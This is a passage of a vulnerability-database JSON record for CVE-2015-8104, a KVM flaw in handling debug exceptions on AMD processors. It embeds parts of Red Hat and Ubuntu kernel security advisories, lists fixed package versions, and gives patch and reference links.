7.1):\n\nSource:\nkernel-3.10.0-229.26.2.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-229.26.2.el7.noarch.rpm\nkernel-doc-3.10.0-229.26.2.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-debug-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-devel-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-headers-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-tools-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-229.26.2.el7.ppc64.rpm\nperf-3.10.0-229.26.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm\n\ns390x:\nkernel-3.10.0-229.26.2.el7.s390x.rpm\nkernel-debug-3.10.0-229.26.2.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-229.26.2.el7.s390x.rpm\nkernel-debug-devel-3.10.0-229.26.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-229.26.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-229.26.2.el7.s390x.rpm\nkernel-devel-3.10.0-229.26.2.el7.s390x.rpm\nkernel-headers-3.10.0-229.26.2.el7.s390x.rpm\nkernel-kdump-3.10.0-229.26.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-229.26.2.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-229.26.2.el7.s390x.rpm\nperf-3.10.0-229.26.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-229.26.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-229.26.2.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debug-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-devel-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-headers-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-tools-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-229.26.2.el7.x86_64.rpm\nperf-3.10.0-229.26.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server EUS (v. 7.1):\n\nSource:\nkernel-3.10.0-229.26.2.ael7b.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-229.26.2.ael7b.noarch.rpm\nkernel-doc-3.10.0-229.26.2.ael7b.noarch.rpm\n\nppc64le:\nkernel-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-bootwrapper-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-debug-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-debug-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-devel-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-headers-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-tools-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-tools-libs-3.10.0-229.26.2.ael7b.ppc64le.rpm\nperf-3.10.0-229.26.2.ael7b.ppc64le.rpm\nperf-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm\npython-perf-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 7.1):\n\nppc64:\nkernel-debug-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-229.26.2.el7.ppc64.rpm\nperf-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm\npython-perf-3.10.0-229.26.2.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-229.26.2.el7.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-3.10.0-229.26.2.el7.s390x.rpm\nkernel-debuginfo-3.10.0-229.26.2.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-229.26.2.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-229.26.2.el7.s390x.rpm\nperf-debuginfo-3.10.0-229.26.2.el7.s390x.rpm\npython-perf-3.10.0-229.26.2.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-229.26.2.el7.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-229.26.2.el7.x86_64.rpm\nperf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\npython-perf-3.10.0-229.26.2.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-229.26.2.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional EUS (v. 7.1):\n\nppc64le:\nkernel-debug-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-debug-devel-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-debuginfo-common-ppc64le-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-tools-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm\nkernel-tools-libs-devel-3.10.0-229.26.2.ael7b.ppc64le.rpm\nperf-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm\npython-perf-3.10.0-229.26.2.ael7b.ppc64le.rpm\npython-perf-debuginfo-3.10.0-229.26.2.ael7b.ppc64le.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2015-8104\nhttps://access.redhat.com/security/cve/CVE-2016-0728\nhttps://access.redhat.com/security/cve/CVE-2016-0774\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2016 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFWsRgRXlSAg2UNWIIRAsuoAJ9mnI1BiwR8EIbz4ftpTIHLgMb7uACgupNa\nZLhiq2N2Uby2QzMRLTMeMXM=\n=H7xL\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Content-Disposition: inline\n\n\n============================================================================\nUbuntu Security Notice USN-2843-2\nDecember 17, 2015\n\nlinux-lts-wily vulnerabilities\n============================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 14.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in the kernel. \n\nSoftware Description:\n- linux-lts-wily: Linux hardware enablement kernel from Wily\n\nDetails:\n\nJan Beulich discovered that the KVM svm hypervisor implementation in the\nLinux kernel did not properly catch Debug exceptions on AMD processors. (CVE-2015-8104)\n\n=E9=83=AD=E6=B0=B8=E5=88=9A discovered that the ppp implementation in the Linux kernel did\nnot ensure that certain slot numbers are valid. \n(CVE-2015-7872)\n\nIt was discovered that the virtual video osd test driver in the Linux\nkernel did not properly initialize data structures. (CVE-2015-7884)\n\nIt was discovered that the driver for Digi Neo and ClassicBoard devices did\nnot properly initialize data structures. (CVE-2015-7885)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 14.04 LTS:\n  linux-image-4.2.0-21-generic    4.2.0-21.25~14.04.1\n  linux-image-4.2.0-21-generic-lpae  4.2.0-21.25~14.04.1\n  linux-image-4.2.0-21-lowlatency  4.2.0-21.25~14.04.1\n  linux-image-4.2.0-21-powerpc-e500mc  4.2.0-21.25~14.04.1\n  linux-image-4.2.0-21-powerpc-smp  4.2.0-21.25~14.04.1\n  linux-image-4.2.0-21-powerpc64-emb  4.2.0-21.25~14.04.1\n  linux-image-4.2.0-21-powerpc64-smp  4.2.0-21.25~14.04.1\n\nAfter a standard system update you need to reboot your computer to make\nall the necessary changes. \n\nATTENTION: Due to an unavoidable ABI change the kernel updates have\nbeen given a new version number, which requires you to recompile and\nreinstall all third party kernel modules you might have installed. If\nyou use linux-restricted-modules, you have to update that package as\nwell to get modules which work with the new kernel version. Unless you\nmanually uninstalled the standard kernel metapackages (e.g. linux-generic,\nlinux-server, linux-powerpc), a standard system upgrade will automatically\nperform this as well",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2015-8104"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      },
      {
        "db": "BID",
        "id": "77524"
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8104"
      },
      {
        "db": "PACKETSTORM",
        "id": "134827"
      },
      {
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "db": "PACKETSTORM",
        "id": "134906"
      },
      {
        "db": "PACKETSTORM",
        "id": "134912"
      },
      {
        "db": "PACKETSTORM",
        "id": "135574"
      },
      {
        "db": "PACKETSTORM",
        "id": "134909"
      },
      {
        "db": "PACKETSTORM",
        "id": "134940"
      }
    ],
    "trust": 2.61
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2015-8104",
        "trust": 2.9
      },
      {
        "db": "BID",
        "id": "77524",
        "trust": 1.4
      },
      {
        "db": "JUNIPER",
        "id": "JSA10783",
        "trust": 1.4
      },
      {
        "db": "BID",
        "id": "91787",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2015/11/10/5",
        "trust": 1.1
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2023/10/10/4",
        "trust": 1.1
      },
      {
        "db": "SECTRACK",
        "id": "1034105",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-005936",
        "trust": 0.8
      },
      {
        "db": "JUNIPER",
        "id": "JSA10770",
        "trust": 0.3
      },
      {
        "db": "VULMON",
        "id": "CVE-2015-8104",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134827",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "135286",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134906",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134912",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "135574",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134909",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "134940",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-8104"
      },
      {
        "db": "BID",
        "id": "77524"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      },
      {
        "db": "PACKETSTORM",
        "id": "134827"
      },
      {
        "db": "PACKETSTORM",
        "id": "135286"
      },
      {
        "db": "PACKETSTORM",
        "id": "134906"
      },
      {
        "db": "PACKETSTORM",
        "id": "134912"
      },
      {
        "db": "PACKETSTORM",
        "id": "135574"
      },
      {
        "db": "PACKETSTORM",
        "id": "134909"
      },
      {
        "db": "PACKETSTORM",
        "id": "134940"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8104"
      }
    ]
  },
  "id": "VAR-201511-0101",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.55138886
  },
  "last_update_date": "2024-07-23T20:38:26.767000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "CTX203879",
        "trust": 0.8,
        "url": "http://support.citrix.com/article/ctx203879"
      },
      {
        "title": "KVM: svm: unconditionally intercept #DB",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/cbdb967af3d54993f5814f1cee0ed311a055377d"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "KVM: svm: unconditionally intercept #DB",
        "trust": 0.8,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cbdb967af3d54993f5814f1cee0ed311a055377d"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - January 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - January 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016verbose-2367956.html"
      },
      {
        "title": "Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "title": "Text Form of Oracle Critical Patch Update - July 2016 Risk Matrices",
        "trust": 0.8,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujul2016verbose-2881721.html"
      },
      {
        "title": "Bug 1278496",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1278496"
      },
      {
        "title": "January 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/january_2016_critical_patch_update"
      },
      {
        "title": "July 2016 Critical Patch Update Released",
        "trust": 0.8,
        "url": "https://blogs.oracle.com/security/entry/july_2016_critical_patch_update"
      },
      {
        "title": "XSA-156",
        "trust": 0.8,
        "url": "http://xenbits.xen.org/xsa/advisory-156.html"
      },
      {
        "title": "Red Hat: Important: kernel security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20160004 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152645 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152552 - security advisory"
      },
      {
        "title": "Red Hat: Important: kernel security and bug fix update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_security_advisories\u0026qid=rhsa-20152636 - security advisory"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2840-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2841-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-utopic vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2844-1"
      },
      {
        "title": "Red Hat: CVE-2015-8104",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2015-8104"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-trusty vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2841-2"
      },
      {
        "title": "Debian Security Advisories: DSA-3454-1 virtualbox -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=77cc990635f1378372ad437247c70f65"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-vivid vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2842-2"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2842-1"
      },
      {
        "title": "Ubuntu Security Notice: linux vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2843-1"
      },
      {
        "title": "Ubuntu Security Notice: linux-lts-wily vulnerabilities",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-2843-2"
      },
      {
        "title": "Debian Security Advisories: DSA-3426-1 linux -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=2582c3762590f583f07dd6e6807c1b8d"
      },
      {
        "title": "Debian Security Advisories: DSA-3414-1 xen -- security update",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_security_advisories\u0026qid=d81330fe0cb138acbe2c11ee586167b2"
      },
      {
        "title": "Debian CVElist Bug Report Logs: Multiple security issues",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=debian_cvelist_bugreportlogs\u0026qid=d3f34965665f8672bfcf7c84c5b82813"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - October 2015",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=435ed9abc2fb1e74ce2a69605a01e326"
      },
      {
        "title": "Oracle VM Server for x86 Bulletins: Oracle VM Server for x86 Bulletin - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_vm_server_for_x86_bulletins\u0026qid=6c15273f6bf4a785175f27073b98a1ce"
      },
      {
        "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=8ad80411af3e936eb2998df70506cc71"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489"
      },
      {
        "title": "Oracle: Oracle Critical Patch Update Advisory - January 2016",
        "trust": 0.1,
        "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=63802a6c83b107c4e6e0c7f9241a66a8"
      },
      {
        "title": "cve_diff_checker",
        "trust": 0.1,
        "url": "https://github.com/lcatro/cve_diff_checker "
      },
      {
        "title": "CVE-Study",
        "trust": 0.1,
        "url": "https://github.com/thdusdl1219/cve-study "
      }
    ],
    "sources": [
      {
        "db": "VULMON",
        "id": "CVE-2015-8104"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-399",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2015-005936"
      },
      {
        "db": "NVD",
        "id": "CVE-2015-8104"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.4,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1278496"
      },
      {
        "trust": 1.4,
        "url": "http://xenbits.xen.org/xsa/advisory-156.html"
      },
      {
        "trust": 1.4,
        "url": "http://support.citrix.com/article/ctx203879"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/cpujan2016-2367955.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/ovmbulletinjul2016-3090546.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinjan2016-2867209.html"
      },
      {
        "trust": 1.4,
        "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinoct2015-2719645.html"
      },
      {
        "trust": 1.4,
        "url": "http://support.citrix.com/article/ctx202583"
      },
      {
        "trust": 1.2,
        "url": "http://www.securityfocus.com/bid/77524"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2016-0046.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2843-1"
      },
      {
        "trust": 1.2,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-2636.html"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2843-2"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2842-1"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2844-1"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2840-1"
      },
      {
        "trust": 1.1,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cbdb967af3d54993f5814f1cee0ed311a055377d"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2015/11/10/5"
      },
      {
        "trust": 1.1,
        "url": "https://github.com/torvalds/linux/commit/cbdb967af3d54993f5814f1cee0ed311a055377d"
      },
      {
        "trust": 1.1,
        "url": "http://www.securityfocus.com/bid/91787"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-08/msg00038.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-04/msg00015.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2016-02/msg00013.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172435.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-11/msg00035.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00005.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00026.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.securitytracker.com/id/1034105"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2841-1"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2016/dsa-3454"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2015/dsa-3426"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00039.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172300.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.debian.org/security/2015/dsa-3414"
      },
      {
        "trust": 1.1,
        "url": "http://lists.fedoraproject.org/pipermail/package-announce/2015-november/172187.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2015-12/msg00031.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2842-2"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2841-2"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-updates/2015-12/msg00053.html"
      },
      {
        "trust": 1.1,
        "url": "http://rhn.redhat.com/errata/rhsa-2015-2645.html"
      },
      {
        "trust": 1.1,
        "url": "https://kb.juniper.net/jsa10783"
      },
      {
        "trust": 1.1,
        "url": "http://www.openwall.com/lists/oss-security/2023/10/10/4"
      },
      {
        "trust": 0.8,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8104"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-8104"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8104"
      },
      {
        "trust": 0.4,
        "url": "https://access.redhat.com/security/cve/cve-2015-8104"
      },
      {
        "trust": 0.3,
        "url": "http://www.linux-kvm.org/page/main_page"
      },
      {
        "trust": 0.3,
        "url": "http://www.xen.org/"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10770\u0026actp=rss"
      },
      {
        "trust": 0.3,
        "url": "https://kb.juniper.net/infocenter/index?page=content\u0026id=jsa10783\u0026cat=sirt_1\u0026actp=list"
      },
      {
        "trust": 0.3,
        "url": "https://technet.microsoft.com/library/security/3108638.aspx"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/oss-sec/2015/q4/249"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0004.html"
      },
      {
        "trust": 0.3,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0024.html"
      },
      {
        "trust": 0.3,
        "url": "http://seclists.org/oss-sec/2015/q4/245"
      },
      {
        "trust": 0.3,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7872"
      },
      {
        "trust": 0.3,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/key/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/articles/11258"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.3,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7885"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7799"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/cve/cve-2015-5307"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-5307"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7884"
      },
      {
        "trust": 0.1,
        "url": "https://cwe.mitre.org/data/definitions/399.html"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/errata/rhsa-2016:0004"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov"
      },
      {
        "trust": 0.1,
        "url": "https://usn.ubuntu.com/2840-1/"
      },
      {
        "trust": 0.1,
        "url": "http://tools.cisco.com/security/center/viewalert.x?alertid=47152"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-7613"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-2925"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2015-7872"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-2925"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7613"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux/3.2.0-96.136"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-utopic/3.16.0-56.75~14.04.1"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0728"
      },
      {
        "trust": 0.1,
        "url": "https://rhn.redhat.com/errata/rhsa-2016-0103.html"
      },
      {
        "trust": 0.1,
